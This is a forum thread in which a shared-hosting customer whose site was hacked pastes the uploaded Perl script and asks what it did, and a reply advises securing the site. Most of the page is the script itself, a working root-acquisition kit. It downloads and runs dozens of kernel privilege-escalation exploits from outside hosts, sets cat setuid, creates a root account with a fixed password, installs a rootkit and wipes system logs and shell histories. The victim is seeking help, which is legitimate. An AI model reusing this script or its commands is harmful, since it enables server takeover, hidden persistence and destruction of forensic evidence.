Web hosting security question


 
Thread Tools Search this Thread
Special Forums Cybersecurity Web hosting security question
# 1  
Old 08-01-2011
Web hosting security question

Hi,

Recently my has been hacked. A .pl script has been uploaded in the root of the directory, which uploaded lot of unwanted files and changed their file permission to 777.

I have no clue how did they upload that .pl file in my hosting.
Website is in shared hosting. Could they access my web root from other website which hosted in the same server?

Or any idea how could they reached my site root?
# 2  
Old 08-01-2011
Lots of ideas, actually, but not knowing details doesn't help.
Ask your web hosting for assistance, but first start looking at your website, especially the places where there's user input.
# 3  
Old 08-01-2011
I didn't get help from host. I will check the user uploading form.

Can you tell me what has he tried / done in my server from this coding?

PHP Code:
#!/usr/bin/perl -w



if(@ARGV 1){ 

print 
q   

 

#=============[ rOot Toolz ]=============# 

uid=0(rootgid=0(rootgroups=0(root) |

|            
Get|rOot v1.0               |

|        Use : 
perl ro0tget.pl -1        |

THNK 2 SarBoT511 SadHacKer SiLver.47 

i-Hmx The injector Z1d No-QrQr Fox HaC 

#=============[ Local root ]=============#

Local root 2010 FreeBsD           -|             

Local root aLL  Exploit           -|         

Local Root Privilege Escalation   -|         

#=============[ after root ]=============#

|    More about GeT rOoT version 1.0 -ab |                                     

|          
Help My i need help       -he |                                 

#========================================#

#============[ Local root ]==============# 

uid=0(root)  gid=0(rootgroups=0(root)|

Local root 2010 x86_64 2.6.18-194 -1   |

Local root 2009 i686   2.6.18-128 -2   |

Local root 2008        2.6.18     -3   |

Local root 2007 x86_64 2.6.22-6   -4   |

all Local root                    -5   |

#============[ after root ]==============#

|           Add root Account        -r   |

|          
add rootkit v4-team      -t   |

|              
rm -rf Log           -rm  |

#============[    about   ]==============# 

|   GeT rOoT By Or4nG.M4n version 1.0    

|    
priv8te [ @ ] Hotmail [ . ] com     

#========================================# 

       
sec4ever.com v4-team.com                                                 

);



exit;

     }



if (
$ARGV[0] =~ "-t" 

          {

print 
"add Shell tools [ t ]\n";

system "wget http";

system "cd /usr/bin;chmod +s cat";

sleep(2);

print 
"\tcompleted .. \n\n";





     } 



if (
$ARGV[0] =~ "-1" 

          {

print 
"Local root 2010 x86_64 2.6.18-194 [ 1 ]\n";

system "pwd";

system "wget http://trav1an.t35.com/Localz/Localz-1";

sleep(2);

print 
"\tcompleted .. \n\n";

system "chmod 777 Localz-1";

sleep(2);

print 
"\tcompleted .. \n\n";

system "./Localz-1";

print 
"\tcompleted .. \n\n";

system "uname -a;pwd;id;su";

     }



if (
$ARGV[0] =~ "-2" 

          {

print 
"Local root 2009 i686 2.6.18-128  [ 2 ]\n";

system "pwd";

system "wget http://trav1an.t35.com/Localz/Localz-2";

sleep(2);

print 
"\tcompleted .. \n\n";

system "chmod 777 Localz-2";

sleep(2);

print 
"\tcompleted .. \n\n";

system "./Localz-2";

print 
"\tcompleted .. \n\n";

system "uname -a;pwd;id;su";

     }     

     

if (
$ARGV[0] =~ "-3" 

          {

print 
"Local root 2008 i686 2.6.18  [ 3 ]\n";

system "pwd";

system "wget http://trav1an.t35.com/Localz/Localz-3";

sleep(2);

print 
"\tcompleted .. \n\n";

system "chmod 777 Localz-3";

sleep(2);

print 
"\tcompleted .. \n\n";

system "./Localz-3";

print 
"\tcompleted .. \n\n";

system "uname -a;pwd;id;su";

     }    

     

if (
$ARGV[0] =~ "-4" 

          {

print 
"Local root 2007 x86_64 2.6.22-6 [ 4 ]\n";

system "pwd";

system "wget http://trav1an.t35.com/Localz/Localz-4";

sleep(2);

print 
"\tcompleted .. \n\n";

system "chmod 777 Localz-4";

sleep(2);

print 
"\tcompleted .. \n\n";

system "./Localz-4";

print 
"\tcompleted .. \n\n";

system "uname -a;pwd;id;su";

     }    

     

if (
$ARGV[0] =~ "-7" 

          {

print  
"Local root 2010 FreeBsD [ bsd ]\n";

system "wget http://trav1an.t35.com/Localz/all/loc4l";

system "chmod 777 loc4l";

system "wget http://trav1an.t35.com/Localz/all/bsdlocal";

system "chmod 777 bsdlocal";

system "wget http://trav1an.t35.com/Localz/all/FreeBSDmaster.passwd.c";

system "chmod 777 FreeBSDmaster.passwd.c";

     }



if (
$ARGV[0] =~ "-8" 

          {

print 
"Local root aLL Exploit [ pri ]\n";

system "wget http://trav1an.t35.com/Localz/all/2.4.20";

system "chmod 777 2.4.20";

system "wget http://trav1an.t35.com/Localz/all/2.4.29";

system "chmod 777 2.4.29";

system "wget http://trav1an.t35.com/Localz/all/2.4.34";

system "chmod 777 2.4.34";

system "wget http://trav1an.t35.com/Localz/all/2.6.8.c";

system "chmod 777 2.6.8.c";

system "wget http://trav1an.t35.com/Localz/all/2.6.6-34.c";

system "chmod 777 2.6.6-34.c";

print 
"\tcompleted .. \n\n";

print 
"\t ok now you can tray any Local";

     }     

     

if (
$ARGV[0] =~ "-9" 

          {

print 
"Local Root Privilege Escalation [ xpl ]\n";

system "pwd";

system 'printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever';

sleep(2);

print 
"\tcompleted .. \n\n";

system "uname -a;su;id";

     } 

     if (
$ARGV[0] =~ "-5" 

          {

          

          

 
system("wget http://www.clearwatercottages.com/modules/2010-1");

system("chmod 777 2010-1");

system("./2010-1");

system("id;whoami");

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.clearwatercottages.com/modules/2010-2");

system("chmod 777 2010-2");

system("./2010-2");

system("id;whoami");

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.clearwatercottages.com/modules/linux-rds-exploit");

system("chmod 777 linux-rds-exploit");

system("./linux-rds-exploit");

system("id;whoami");

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.clearwatercottages.com/modules/i-can-haz-modharden");

system("chmod 777 i-can-haz-modharden");

system("./i-can-haz-modharden");

system("id;whoami");

          

          
system("wget http://www.solarens.com/templates/beez/2.6.34-2011");

system("chmod 777 2.6.34-2011"); 

system("./2.6.34-2011"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("id");



          

system("wget http://www.schoolbd.com/adsense/cc/iskorpitx");

system("chmod 777 iskorpitx"); 

system("./iskorpitx"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/c");

system("chmod 777 c");

system("./c");

system("id");

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/d");

system("chmod 777 d");

system("./d");

system("id");

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/44");

system("chmod 777 44");

system("./44");

system("id");

system("wget http://www.schoolbd.com/adsense/cc/9521");

system("chmod 777 9521");

system("./9521");

system("id");

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/run97"); 

system("chmod 777 run97"); 

system("./97"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/froot"); 

system("chmod 777 froot"); 

system("./froot"); 

system("id"); 

system("id"); 

system("id"); 

system("id"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/18-1.c"); 

system("gcc -Wall -o 18-1 18-1.c"); 

system("gcc -Wall -m64 -o 18-3 18-1.c"); 

system("chmod 777 18-1"); 

system("chmod 777 18-3"); 

system("./18-1"); 

system("id"); 

system("./18-3"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/18-2");  

system("chmod 777 18-2"); 

system("./18-2"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/18-3");  

system("chmod 777 18-3"); 

system("./18-3"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/18-5");  

system("chmod 777 18-5"); 

system("./18-5"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/exploit2");  

system("chmod 777 exploit2"); 

system("./exploit2"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/exp1");  

system("chmod 777 exp1"); 

system("./exp1"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/exp2");  

system("chmod 777 exp2"); 

system("./exp2"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/exp3");  

system("chmod 777 exp3"); 

system("./exp3"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/2009-1");  

system("chmod 777 2009-1"); 

system("./2009-1"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/3.c"); 

system("gcc 3.c -o 3");  

system("chmod 777 3"); 

system("./3"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/3a"); 

system("chmod 777 3a"); 

system("./3a"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/4.c"); 

system("gcc 4.c -o 4");  

system("chmod 777 4"); 

system("./4"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/4a"); 

system("chmod 777 4a"); 

system("./4a"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n"

system("wget http://www.schoolbd.com/adsense/cc/cx.c"); 

system("gcc cx.c -o cx");  

system("chmod 777 cx"); 

system("./cx"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n"

system("wget http://www.schoolbd.com/adsense/cc/cxx.c"); 

system("gcc cxx.c -o cxx");  

system("chmod 777 cxx"); 

system("./cxx"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n"

system("wget http://www.schoolbd.com/adsense/cc/exploit2"); 

system("chmod 777 exploit2"); 

system("./exploit2"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n"

system("wget http://www.schoolbd.com/adsense/cc/run"); 

system("chmod 777 run"); 

system("./run"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n"

system("wget http://www.schoolbd.com/adsense/cc/rootsh.c"); 

system("gcc rootsh.c -o rootsh");  

system("chmod 777 rootsh"); 

system("./rootsh"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/29.c"); 

system("gcc 29.c -o 29");  

system("chmod 777 29"); 

system("./29"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/30");  

system("chmod 777 30"); 

system("./30"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/2009");  

system("chmod 777 2009"); 

system("./2009"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/pwnkernel");  

system("chmod 777 pwnkernel"); 

system("./pwnkernel"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n"

system("wget http://www.schoolbd.com/adsense/cc/05"); 

system("chmod 777 05"); 

system("./05"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n"

system("wget http://www.schoolbd.com/adsense/cc/isko"); 

system("chmod 777 isko"); 

system("./isko"); 

system("id");

system("./isko"); 

system("isko");

print 
"If u r r00t stop xpl with ctrl+c\n"

system("wget http://www.schoolbd.com/adsense/cc/18"); 

system("chmod 777 18"); 

system("./18"); 

system("id"); 

system("./18"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n"

system("wget http://www.schoolbd.com/adsense/cc/7"); 

system("chmod 777 7"); 

system("./7"); 

system("id"); 

system("./7"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n"

system("wget http://www.schoolbd.com/adsense/cc/7-2"); 

system("chmod 777 7-2"); 

system("./7-2"); 

system("id"); 

system("./7-2"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n"

system("wget http://www.schoolbd.com/adsense/cc/8"); 

system("chmod 777 8"); 

system("./8"); 

system("id"); 

system("./8"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n"

system("wget http://www.schoolbd.com/adsense/cc/8a"); 

system("chmod 777 8a"); 

system("./8a"); 

system("id"); 

system("./8a"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n"

system("wget http://www.schoolbd.com/adsense/cc/8bb"); 

system("chmod 777 8bb"); 

system("./8bb"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n"

system("wget http://www.schoolbd.com/adsense/cc/8cc"); 

system("chmod 777 8cc"); 

system("./8cc"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n"

system("wget http://www.schoolbd.com/adsense/cc/8x"); 

system("chmod 777 8x"); 

system("./8x"); 

system("id"); 

system("./8x"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n"

system("wget http://www.schoolbd.com/adsense/cc/2008"); 

system("chmod 777 2008"); 

system("./2008"); 

system("id");

print 
"If u r r00t stop xpl with ctrl+c\n"

system("wget http://www.schoolbd.com/adsense/cc/exploit"); 

system("chmod 777 exploit"); 

system("./exploit"); 

system("id"); ; 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("wget http://www.schoolbd.com/adsense/cc/2009xx");  

system("chmod 777 2009xx"); 

system("./2009xx"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n"

system("wget http://www.schoolbd.com/adsense/cc/2.6.9-55-2007-prv8"); 

system("chmod 777 2.6.9-55-2007-prv8"); 

system("./2.6.9-55-2007-prv8"); 

system("id"); 

system("./2.6.9-55-2007-prv8"); 

system("id"); 

system("./2.6.9-55-2007-prv8"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";  

print 
"If u malesef rootlayamadin baska serverlerde mutlaka ama mutlaka:)by iskorpitx - Edit BY nO lOv3 \n"

}

if (
$ARGV[0] =~ "-k" 

          {

print 
"Local root 2009 i686 2.6.18-128  [ 2 ]\n";

system "wget http://grsecurity.net/~spender/64bit_dos.c";

sleep(2);

system("gcc 64bit_dos.c -o 64bit_dos");  

sleep(2);

print 
"\tcompleted .. \n\n";

system "chmod 777 64bit_dos";

sleep(2);

print 
"\tcompleted .. \n\n";

system "./64bit_dos";

print 
"\tcompleted .. \n\n";

system "uname -a;pwd;id;su";

sleep(2);

system "wget http://grsecurity.net/~spender/exploit.txt";

sleep(2);

system("gcc exploit.txt -o exploitcc");  

sleep(2);

print 
"\tcompleted .. \n\n";

system "chmod 777 exploitcc";

sleep(2);

print 
"\tcompleted .. \n\n";

system "./exploitcc";

print 
"\tcompleted .. \n\n";

system "uname -a;pwd;id;su";

sleep(2);

system "wget http://grsecurity.net/~spender/grlogalert.c";

sleep(2);

system("gcc grlogalert.c -o grlogalert");  

sleep(2);

print 
"\tcompleted .. \n\n";

system "chmod 777 grlogalert";

sleep(2);

print 
"\tcompleted .. \n\n";

system "./grlogalert";

print 
"\tcompleted .. \n\n";

system "uname -a;pwd;id;su";

sleep(2);

system "wget http://grsecurity.net/~spender/vmlinuz_to_vmlinux_gz.c";

sleep(2);

system("gcc vmlinuz_to_vmlinux_gz.c -o vmlinuz_to_vmlinux_gz");  

sleep(2);

print 
"\tcompleted .. \n\n";

system "chmod 777 vmlinuz_to_vmlinux_gz";

sleep(2);

print 
"\tcompleted .. \n\n";

system "./vmlinuz_to_vmlinux_gz";

print 
"\tcompleted .. \n\n";

system "uname -a;pwd;id;su";

sleep(2);

system "wget http://grsecurity.net/~spender/crashvmlinuz";

print 
"\tcompleted .. \n\n";

system "chmod 777 crashvmlinuz";

sleep(2);

print 
"\tcompleted .. \n\n";

system "./crashvmlinuz";

print 
"\tcompleted .. \n\n";

system "uname -a;pwd;id;su";

sleep(2);

system "wget http://dazzlestudio.net/2.6.18-164";

print 
"\tcompleted .. \n\n";

system "chmod 777 2.6.18-164";

sleep(2);

print 
"\tcompleted .. \n\n";

system "./2.6.18-164";

print 
"\tcompleted .. \n\n";

system "uname -a;pwd;id;su";

sleep(2);

system "wget http://alexoloughlinsplace.com/forum/NewDir/z1d-2011";

print 
"\tcompleted .. \n\n";

system "chmod 777 z1d-2011";

sleep(2);

print 
"\tcompleted .. \n\n";

system "./z1d-2011";

print 
"\tcompleted .. \n\n";

system "uname -a;pwd;id;su";

     }    

if (
$ARGV[0] =~ "-ab" 

          {

print 
(

             

sec4ever.com

);



     }

 

if (
$ARGV[0] =~ "-t" 

          {

print 
"Add Root Account [ r ]\n";

print 
"user : [ roor ]\n";

system "adduser -g 0 roor -G wheel,sys,bin,daemon,adm,disk -d /sf7 -s /bin/sh";

system "passwd r0otH4x0r";

print 
"pass is : r0otH4x0r\n";

sleep(2); 



     }         

     if (
$ARGV[0] =~ "-d" 

          {

  
system("wget http://pjk.danawa.my/templates/beez/priv8-2.6.18.2010");

system("chmod 777 priv8-2.6.18.2010"); 

system("./priv8-2.6.18.2010"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("id");



  
system("wget http://pjk.danawa.my/templates/beez/priv8-2.6.18-164-2010");

system("chmod 777 priv8-2.6.18-164-2010"); 

system("./priv8-2.6.18-164-2010"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("id");



  
system("wget http://pjk.danawa.my/templates/beez/2.6.18");

system("chmod 777 2.6.18"); 

system("./2.6.18"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("id");



 
system("wget http://pjk.danawa.my/templates/beez/2");

system("chmod 777 2"); 

system("./2"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("id");



 
system("wget http://pjk.danawa.my/templates/beez/1");

system("chmod 777 1"); 

system("./1"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("id");





 
system("wget http://pjk.danawa.my/templates/beez/2.6.18-194");

system("chmod 777 2.6.18-194"); 

system("./2.6.18-194"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("id");





 
system("wget http://pjk.danawa.my/templates/beez/2.6.32-21-generic-2010-i686");

system("chmod 777 2.6.32-21-generic-2010-i686"); 

system("./2.6.32-21-generic-2010-i686"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("id");



 
system("wget http://pjk.danawa.my/templates/beez/2.6.18-53");

system("chmod 777 2.6.18-53"); 

system("./2.6.18-53"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("id");



 
system("wget http://pjk.danawa.my/templates/beez/2.6.18-53");

system("chmod 777 2.6.30"); 

system("./2.6.18-53"); 

system("id"); 

print 
"If u r r00t stop xpl with ctrl+c\n";

system("id");



   }

if (
$ARGV[0] =~ "-c" 

          {

system "wget http://rbht.pp.ru/files/enlightenment.tgz";

sleep(2); 

system "tar xzf enlightenment.tgz";

sleep(2); 

system "cd enlightenment";

system "sed -i '/turn_\(on\|off\)_wp();/d' exploit.c";

sleep(2); 

system "./run_null_exploits.sh";

sleep(2); 

system "id";

system "id"

system "If u r r00t stop xpl with ctrl+c\n";

system "uname -a;su;id";

     } 

     

if (
$ARGV[0] =~ "-rm" 

          {

print 
"rm -rf Log [ rm ] \n";

system "rm -rf /tmp/logs";

system "rm -rf /root/.ksh_history";

system "rm -rf /root/.bash_history";

system "rm -rf /root/.bash_logout";

system "rm -rf /usr/local/apache/logs";

sleep(2);

system "rm -rf /usr/local/apache/log";

system "rm -rf /var/apache/logs";

system "rm -rf /var/apache/log";

system "rm -rf /var/run/utmp";

system "rm -rf /var/logs";

system "rm -rf /var/log";

sleep(2);

system "rm -rf /var/adm";

system "rm -rf /etc/wtmp";

system "rm -rf /etc/utmp";

system "cd /bin";

print 
"\tcompleted .. \n\n";

     }

if (
$ARGV[0] =~ "-v4" 

          {

print 
"Add v4-team Rootkit [ v4 ]\n";

system "wget http://trav1an.t35.com/v4team-rootkit.tar.gz";

system "tar -xvvzf v4team-rootkit.tar.gz";

system "cd rootkit;./install";

print 
"user : wo7oshv4team ,  pass : v4teamhacker \n";

system "id";

print 
"\tcompleted .. \n\n";

     }

     

     

if (
$ARGV[0] =~ "-he" 

          {

print 
(



|        Use : 
perl ro0tget.pl -1        |



);



     } 
# 4  
Old 08-02-2011
Sorry, I'm not going to download all these web resources, just to check what they might possibly do. It's some sort of root access acquisition attempt or similar, but what's most important is that you should secure your site.

Hosting companies do not often offer support on private owners issues like security, but rather they are responsible only for the hosting environment, though some UAP might suggest proactive measures being undertaken in order to avoid bigger incident.
Back in my security officer days, I have personally disabled / renamed insecure customer scripts / pieces of code, as spammers, for example, are very keen to use them in a short periods of time, which usually causes this particular hosting server to get blacklisted at major providers.

So, bottom line - inspect your site, if you are sure (got a confirmation) that this is isolated issue, and not a hosting env. one.
Login or Register to Ask a Question

Previous Thread | Next Thread

4 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

Ldap connection after hosting on Web Server

Hi.. I have very limited knowledge on LDAP and its configuration and but I have been trying to figure out one issue that takes place when I am running the program that is written in php, but so far its unsuccessful. The server, I am working on is ldap server, which is running on Apache. After... (1 Reply)
Discussion started by: GomathiUoM
1 Replies

2. Web Development

ASP.NET 5 Application on Centos OS7 Web Hosting Server

Hi All, Frankly I'm new to Linux Environment. While we are trying to Host an ASP.NET 5 Web Application on Centos OS7 Web hosting Server. There were couple of steps which we are supposed to go through, please see this link - We are stuck at Create a Container & then Running the Container,... (1 Reply)
Discussion started by: John Fredric
1 Replies

3. Cybersecurity

Web hosting security

Hello, guys ! The company I work for has a few web hosting servers and I'd like to know how can I secure the servers a little bit ? The situation is like this: Apache runs as nobody so all users can run scripts as nobody. This is a big security problem beacause if I have an account on the... (4 Replies)
Discussion started by: Sergiu-IT
4 Replies

4. UNIX for Dummies Questions & Answers

Web page hosting

I built my website based on Dreamweaver, on Windows platform. My server uses Unix, and the page doesn't look too good. Is there any way to solve this problem without too much of a headache? (1 Reply)
Discussion started by: PCL
1 Replies
Login or Register to Ask a Question